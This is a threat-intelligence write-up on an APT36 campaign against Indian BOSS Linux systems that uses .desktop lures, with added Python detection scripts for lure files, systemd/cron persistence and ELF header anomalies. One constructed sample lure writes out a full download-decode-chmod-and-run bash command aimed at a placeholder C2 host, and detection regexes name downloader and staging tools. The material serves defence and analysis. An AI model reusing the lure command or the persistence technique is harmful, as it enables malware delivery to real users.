APT36 Exploits .desktop Files to Target Indian BOSS Linux Systems

In early August 2025, cybersecurity researchers identified a sophisticated campaign by the Pakistan-based Advanced Persistent Threat (APT) group, APT36, targeting India’s BOSS (Bharat Operating System Solutions) Linux systems. This operation employs weaponized .desktop shortcut files to infiltrate and compromise government infrastructure.

Initial Attack Vector

The attack begins with spear-phishing emails containing a ZIP archive named Meeting_Notice_Ltr_ID1543ops.pdf_.zip. Upon extraction, the archive reveals a file titled Meeting_Ltr_ID1543ops.pdf.desktop. When the user opens this .desktop file, its execution line runs a series of commands that download and launch a malicious ELF (Executable and Linkable Format) payload built for x86-64 Linux systems.

Execution and Payload Deployment

The .desktop file’s execution line embeds a bash command that performs the following actions:

1. Creates a timestamped temporary file in the /tmp directory.

2. Uses the curl command to retrieve a hex-encoded payload from a remote server.

3. Converts the hex-encoded payload into a binary executable using the xxd utility.

4. Assigns execution permissions to the binary and launches it in the background.

As a decoy, the same command also opens a benign PDF document hosted on Google Drive in the Firefox browser, so that the user's attention is drawn away from the malicious activity running in the background.
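The four-step execution line described above is easy to recognise once a .desktop file is read as data rather than launched. The following triage script is an added example written for this article; it is not APT36 tooling and not any vendor's detection content. It parses the [Desktop Entry] group, scores the Exec= value against heuristics that mirror each step (downloader, hex decoder, staging under /tmp, chmod +x, backgrounding, a hidden shell wrapper) and flags the double-extension lure name. The two sample entries are constructed, and every host name in them is a placeholder under the reserved .invalid TLD; the default scan directories are an assumption about where such files land.

```python
"""Triage .desktop files for loader-style Exec= lines.

Added example for this write-up; not APT36 tooling and not a vendor's
detection rule. Sample entries are constructed; hosts are placeholders.
"""
import re
import sys
from dataclasses import dataclass, field
from pathlib import Path

# Each heuristic mirrors one step of the behaviour described in the article:
# fetch with curl, decode hex with xxd, stage under /tmp, chmod +x, run in the
# background, all wrapped in "bash -c" so the user never sees a terminal.
HEURISTICS = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "decoder": re.compile(r"\bxxd\s+-r|\bbase64\s+(-d|--decode)\b"),
    "stages_in_tmp": re.compile(r"/tmp/|/dev/shm/|\bmktemp\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"),
    "backgrounded": re.compile(r"\s&(\s|$)"),          # a lone "&", not "&&"
    "shell_wrapper": re.compile(r"\b(bash|sh|dash)\s+-c\b"),
}
# "name.pdf.desktop" is shown as "name.pdf" by file managers that hide the suffix.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.desktop$", re.I)


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Three independent indicators keep a single match (a legitimate
        # "Exec=sh -c ..." wrapper, say) from raising an alert on its own.
        return len(self.reasons) >= 3


def parse_desktop(text: str) -> dict:
    """Minimal, case-sensitive reader for the [Desktop Entry] group."""
    entries, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")   # Exec values may contain '=' themselves
            entries[key.strip()] = value.strip()
    return entries


def triage_desktop(path: str, text: str) -> Finding:
    """Score one .desktop file; the returned Finding lists every indicator that fired."""
    entries = parse_desktop(text)
    exec_line = entries.get("Exec", "")
    finding = Finding(path=path)
    for name, pattern in HEURISTICS.items():
        if pattern.search(exec_line):
            finding.reasons.append(name)
    if DOUBLE_EXT.search(Path(path).name):
        finding.reasons.append("double_extension")
    if "shell_wrapper" in finding.reasons and entries.get("Terminal", "").lower() == "false":
        finding.reasons.append("hidden_terminal")
    if "shell_wrapper" in finding.reasons and "pdf" in entries.get("Icon", "").lower():
        finding.reasons.append("document_icon_runs_shell")
    return finding


def scan(roots) -> list:
    """Triage every .desktop file below the given directories; return the suspicious ones."""
    hits = []
    for root in roots:
        for p in Path(root).rglob("*.desktop"):
            try:
                f = triage_desktop(str(p), p.read_text(errors="replace"))
            except OSError:
                continue
            if f.suspicious:
                hits.append(f)
    return hits


# Constructed sample modelled on the steps in the article; hosts are placeholders.
SAMPLE_LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "f=/tmp/$(date +%s); curl -s http://c2.placeholder.invalid/p.hex | xxd -r -p > $f; chmod +x $f; $f & firefox https://drive.placeholder.invalid/decoy.pdf"
"""

# Constructed sample of an ordinary application launcher.
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=Firefox
Exec=firefox %u
Icon=firefox
Terminal=false
"""

if __name__ == "__main__":
    # Assumed default locations; pass directories on the command line to override.
    roots = sys.argv[1:] or [Path.home() / "Desktop", Path.home() / "Downloads",
                             Path.home() / ".local/share/applications"]
    for f in scan(roots):
        print(f"{f.path}: {', '.join(f.reasons)}")
```

Run it with no arguments to sweep the assumed user directories, or point it at a mail quarantine or extraction folder. The threshold of three indicators is a design choice: any single heuristic has benign matches, but a document-named launcher that downloads, decodes, stages and backgrounds a binary matches most of them at once.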

Persistence Mechanisms

Once the ELF payload is executed, it establishes persistence on the infected system through multiple methods:

– Systemd Service: The malware installs a user-level systemd service named system-update.service, ensuring that the malicious binary is executed during system startup.

– Cron Job: A cron job is created to execute the malicious binary located at `.config/systemd/systemd-update` upon system reboot.

These persistence techniques allow the malware to maintain control over the compromised system without requiring further user interaction.
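Both persistence artefacts described above live in places a defender can enumerate per user: the user unit directory and the user's crontab. The hunt script below is an added example written for this article, not APT36 code and not a vendor's detection rule. It checks each unit file's name against the reported service name and its ExecStart binary against the reported path and against directories from which no legitimately installed service should run, then applies the same command checks to every crontab entry. The unit files and crontab are constructed samples; the home directory /home/analyst and the location ~/.config/systemd/user for user units are assumptions.

```python
"""Hunt for the user-level systemd service and cron persistence described above.

Added example for this write-up; not APT36 code and not a vendor's rule.
Samples are constructed; /home/analyst and ~/.config/systemd/user are assumptions.
"""
import re
import subprocess
from pathlib import Path, PurePosixPath

# Indicators taken from the article.
IOC_UNIT_NAMES = {"system-update.service"}
IOC_PATH_FRAGMENTS = (".config/systemd/systemd-update",)
# A properly installed service binary has no business running from these.
UNUSUAL_EXEC_DIRS = ("/tmp/", "/dev/shm/", "/.config/", "/.cache/")
# "@reboot cmd" or the five schedule fields followed by the command.
CRON_LINE = re.compile(r"^(@\w+|(\S+\s+){5})\s*(?P<cmd>.+)$")


def parse_unit(text: str) -> dict:
    """Tiny systemd unit reader: {section: {key: value}}, last assignment wins."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def command_reasons(cmd: str) -> list:
    """Why a command string (ExecStart binary or cron command) looks like this campaign."""
    reasons = []
    if any(frag in cmd for frag in IOC_PATH_FRAGMENTS):
        reasons.append("runs the binary path reported for this campaign")
    if any(d in cmd for d in UNUSUAL_EXEC_DIRS):
        reasons.append("executes from a temp or dot-directory")
    return reasons


def check_unit(path: str, text: str) -> list:
    """Reasons a unit file matches the persistence described above (empty list = clean)."""
    reasons = []
    name = PurePosixPath(path).name
    if name in IOC_UNIT_NAMES:
        reasons.append(f"unit name matches reported IoC ({name})")
    exec_start = parse_unit(text).get("Service", {}).get("ExecStart", "")
    # ExecStart may carry a prefix such as "-" or "@"; the first token is the binary.
    tokens = exec_start.lstrip("-@:+!").split()
    reasons += command_reasons(tokens[0] if tokens else "")
    return reasons


def check_crontab(text: str) -> list:
    """(line, reasons) for every crontab entry whose command looks suspicious."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        m = CRON_LINE.match(line) if line and not line.startswith("#") else None
        if m:
            reasons = command_reasons(m.group("cmd"))
            if reasons:
                findings.append((line, reasons))
    return findings


def hunt(units: dict, crontab: str) -> dict:
    """units: {path: content}. Returns only the items that produced findings."""
    flagged = {}
    for path, text in units.items():
        reasons = check_unit(path, text)
        if reasons:
            flagged[path] = reasons
    return {"units": flagged, "cron": check_crontab(crontab)}


def collect_live() -> tuple:
    """Read the current user's unit files and crontab from the assumed locations."""
    unit_dir = Path.home() / ".config/systemd/user"
    units = {str(p): p.read_text(errors="replace")
             for p in unit_dir.glob("*.service")} if unit_dir.is_dir() else {}
    try:
        crontab = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        crontab = ""
    return units, crontab


# Constructed samples: one unit modelled on the article's description, one benign unit.
SAMPLE_UNITS = {
    "/home/analyst/.config/systemd/user/system-update.service": """[Unit]
Description=System Update
[Service]
ExecStart=/home/analyst/.config/systemd/systemd-update
Restart=always
[Install]
WantedBy=default.target
""",
    "/home/analyst/.config/systemd/user/syncthing.service": """[Unit]
Description=Syncthing
[Service]
ExecStart=/usr/bin/syncthing serve --no-browser
[Install]
WantedBy=default.target
""",
}
SAMPLE_CRONTAB = """# m h dom mon dow command
@reboot /home/analyst/.config/systemd/systemd-update
0 3 * * * /usr/bin/rsync -a /home/analyst/docs /mnt/backup
"""

if __name__ == "__main__":
    result = hunt(*collect_live())
    for path, reasons in result["units"].items():
        print(f"UNIT {path}: {'; '.join(reasons)}")
    for line, reasons in result["cron"]:
        print(f"CRON {line!r}: {'; '.join(reasons)}")
```

The name check alone is brittle (a renamed unit evades it), which is why the ExecStart and cron command checks look at where the binary lives rather than what it is called: a service whose executable sits under ~/.config is unusual regardless of the unit name, since that directory holds configuration, not programs.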

Command and Control Communication

The malware communicates with its command-and-control (C2) servers using obfuscated DNS queries over nonstandard ports. The primary C2 server identified is modgovindia.space:4000. This communication method facilitates both the retrieval of commands from the attackers and the exfiltration of sensitive data from the infected systems.

Malicious Infrastructure

The domains securestore.cv and modgovindia.space were registered in July 2025 and have been flagged as part of the malicious infrastructure supporting this campaign. The rapid deployment of these domains, coupled with the tailored payloads, underscores APT36’s evolving sophistication and strategic focus on India’s public sector.

Technical Analysis of the ELF Payload

A deeper examination of the ELF payload reveals several noteworthy characteristics:

– ELF Header: The payload is a statically linked 64-bit LSB executable. Anomalous section headers are present, likely intended to hinder static analysis by security researchers.

– Execution Flow: After conversion from its hex-encoded form and execution, the payload installs the aforementioned persistence mechanisms. It then establishes nonblocking UDP sockets and utilizes the epoll system call for efficient I/O operations, facilitating its DNS-based C2 communications.
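The two header traits called out above, a statically linked ELF64 LSB binary and section headers that do not add up, can be checked without running anything. The script below is an added example written for this article; it is not the analysed payload and not a vendor's tool. It unpacks the Elf64_Ehdr, verifies that the program and section header tables fit inside the file and are internally consistent, and derives a static-linking verdict from the absence of PT_INTERP and PT_DYNAMIC segments. build_sample() fabricates a minimal ELF image purely so the checks have input; its bytes are filler, not a real program.

```python
"""Sanity-check an ELF64 header for the traits described above.

Added example for this write-up; not the analysed payload and not a vendor's
tool. build_sample() constructs a tiny, inert ELF image as test input.
"""
import struct
import sys

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian (64 bytes)
PHDR = struct.Struct("<IIQQQQQQ")          # Elf64_Phdr (56 bytes)
SHENT_SIZE = 64                            # sizeof(Elf64_Shdr)
EM_X86_64 = 62
PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3


def analyze_elf(data: bytes) -> dict:
    """Report class/endianness, machine, a static-linking verdict and header anomalies."""
    result = {"is_elf64_lsb": False, "machine": None, "static_linked": None, "anomalies": []}
    anomalies = result["anomalies"]
    if len(data) < EHDR.size or data[:4] != b"\x7fELF":
        anomalies.append("not an ELF image")
        return result
    (ident, _e_type, e_machine, _e_version, _e_entry, e_phoff, e_shoff, _e_flags,
     e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx) = EHDR.unpack_from(data)
    result["is_elf64_lsb"] = ident[4] == 2 and ident[5] == 1   # EI_CLASS=ELFCLASS64, EI_DATA=LSB
    result["machine"] = e_machine
    if not result["is_elf64_lsb"]:
        anomalies.append("not a 64-bit little-endian image; remaining checks assume ELF64 LSB")
        return result
    size = len(data)
    if e_ehsize != EHDR.size:
        anomalies.append(f"e_ehsize {e_ehsize} != {EHDR.size}")
    if e_phnum and e_phentsize != PHDR.size:
        anomalies.append(f"e_phentsize {e_phentsize} != {PHDR.size}")
    ph_ok = e_phoff + e_phnum * e_phentsize <= size
    if not ph_ok:
        anomalies.append("program header table extends past end of file")
    # A fully stripped file may legitimately have no section headers at all
    # (e_shoff == 0 and e_shnum == 0); anything else must be self-consistent.
    if e_shoff == 0 and e_shnum:
        anomalies.append("e_shnum nonzero but e_shoff is zero")
    if e_shnum and e_shentsize != SHENT_SIZE:
        anomalies.append(f"e_shentsize {e_shentsize} != {SHENT_SIZE}")
    if e_shoff and e_shoff + e_shnum * e_shentsize > size:
        anomalies.append(f"section header table extends past end of file "
                         f"(e_shoff=0x{e_shoff:x}, e_shnum={e_shnum}, file size={size})")
    if e_shnum and e_shstrndx >= e_shnum:
        anomalies.append(f"e_shstrndx {e_shstrndx} out of range")
    elif not e_shnum and e_shstrndx:
        anomalies.append("e_shstrndx set but no section headers")
    # Static vs dynamic: a dynamically linked executable carries PT_INTERP and PT_DYNAMIC.
    if ph_ok:
        types = [PHDR.unpack_from(data, e_phoff + i * e_phentsize)[0] for i in range(e_phnum)]
        result["static_linked"] = PT_INTERP not in types and PT_DYNAMIC not in types
    return result


def build_sample(bogus_sections: bool) -> bytes:
    """Constructed ELF64 x86-64 image: one PT_LOAD, no interpreter, optional broken section table."""
    phdr = PHDR.pack(PT_LOAD, 5, 0, 0x400000, 0x400000, 0x80, 0x80, 0x1000)  # flags R+X
    body = b"\x00" * 8                       # inert filler bytes
    shoff, shnum, shstrndx = (0xFFFFF000, 12, 11) if bogus_sections else (0, 0, 0)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, LSB, EV_CURRENT
    ehdr = EHDR.pack(ident, 2, EM_X86_64, 1, 0x400078, EHDR.size, shoff, 0,
                     EHDR.size, PHDR.size, 1, SHENT_SIZE, shnum, shstrndx)
    return ehdr + phdr + body


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample(True)
    report = analyze_elf(data)
    print(f"ELF64 LSB: {report['is_elf64_lsb']}  machine: {report['machine']}  "
          f"static: {report['static_linked']}")
    for a in report["anomalies"]:
        print("  anomaly:", a)
```

Pointed at a suspect file, the script gives the same first-pass answers a reviewer would otherwise read off `readelf -h`, but as structured output that a triage pipeline can act on; a section header table that points past the end of the file is exactly the kind of inconsistency that makes some static-analysis tools refuse to load the binary.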

Implications and Recommendations

This campaign highlights APT36’s advanced tradecraft and their ability to adapt to different operating environments, including Linux systems. The use of .desktop files as an attack vector is particularly concerning, as it exploits the trust users place in seemingly benign shortcut files.

To mitigate the risks associated with such attacks, organizations, especially those within the government sector, should consider implementing the following measures:

1. Enhanced Email Security: Deploy advanced email filtering solutions capable of detecting and blocking spear-phishing attempts that contain malicious attachments or links.

2. Application Whitelisting: Implement application whitelisting to prevent the execution of unauthorized or unknown applications, including potentially malicious .desktop files.

3. Endpoint Monitoring: Utilize endpoint detection and response (EDR) solutions to monitor for suspicious activities, such as the creation of unexpected systemd services or cron jobs.

4. User Education: Conduct regular training sessions to educate users about the dangers of phishing attacks and the importance of verifying the authenticity of email attachments and links before interacting with them.

By adopting these proactive measures, organizations can enhance their resilience against sophisticated cyber threats like those posed by APT36.